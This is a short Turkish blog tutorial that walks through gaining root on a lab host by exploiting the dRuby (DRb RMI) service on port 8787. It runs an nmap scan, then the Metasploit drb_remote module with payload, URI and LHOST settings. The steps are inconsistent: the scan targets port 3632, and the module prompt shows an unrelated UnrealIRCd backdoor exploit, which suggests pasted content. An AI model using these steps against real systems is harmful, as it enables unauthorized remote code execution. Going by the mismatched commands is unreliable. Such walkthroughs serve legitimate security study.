Ruby Nedir? Ruby, nesneye yönelik, dinamik, reflektif bir programlama dilidir. Ruby dili, Yukihiro Matsumoto tarafından Japonya’da tas...

Ruby DRb RMI | 8787/tcp | Pentesting

9/30/2017 0 Yorumlar



Ruby Nedir?

Ruby, nesneye yönelik, dinamik, reflektif bir programlama dilidir. Ruby dili, Yukihiro Matsumoto tarafından Japonya’da tasarlanmaya ve geliştirilmeye başlanmıştır.

Sözdizimi olarak, Ada, Perl, Smalltalk, Lisp, Eiffel[3] gibi programlama dillerinden etkilenen Ruby; Python ile kimi ortak sözdizimi özelliklerine sahiptir. Fonksiyonel, nesneye yönelik, dinamik, reflektif gibi çoklu programlama paradigmalarını destekler.

Özgür bir yazılım olan Ruby; GPL ve Ruby lisansı[4] ile lisanslanmıştır.

dRuby servisinde oluşan güvenlik zaafiyeti ise Uzaktan Kod Yürütme mantığıyla exploit edilir.

Zafiyet, "8787/tcp" portu üzerinde ki, "drb" servisinin, "Ruby DRb RMI" versionuna aittir.

############################################################################################

"nmap -sV -p 3632 192.168.198.129" -> nmap -sS -p <taranacak_port> <hedef_ip> şeklinde yazdık.



"search drb_remote" -> drb_remote adının geçtiği exploitleri listeliyoruz.



############################################################################################

"set payload <ayarlanacak_payload>" -> Kullanacağımız payload’ı belirtiyoruz.

exploit(unreal_ircd_3281_backdoor)"set URI" -> gerekli değeri veriyoruz; http://ip_adresi:80 yerine druby://ip_adresi:8787 şeklinde url giriyoruz .

exploit(unreal_ircd_3281_backdoor)"set lhost" -> Local ip adresimizi yazıyoruz. Komut çalıştırabileceğiniz cmd prompt’una win: ipconfig / linux: ifconfig yazıp öğrenebilirsiniz.

exploit(unreal_ircd_3281_backdoor)"exploit" -> Sızma işlemini başlatıyoruz.



############################################################################################

Ve rootuz :)



############################################################################################

0 yorum: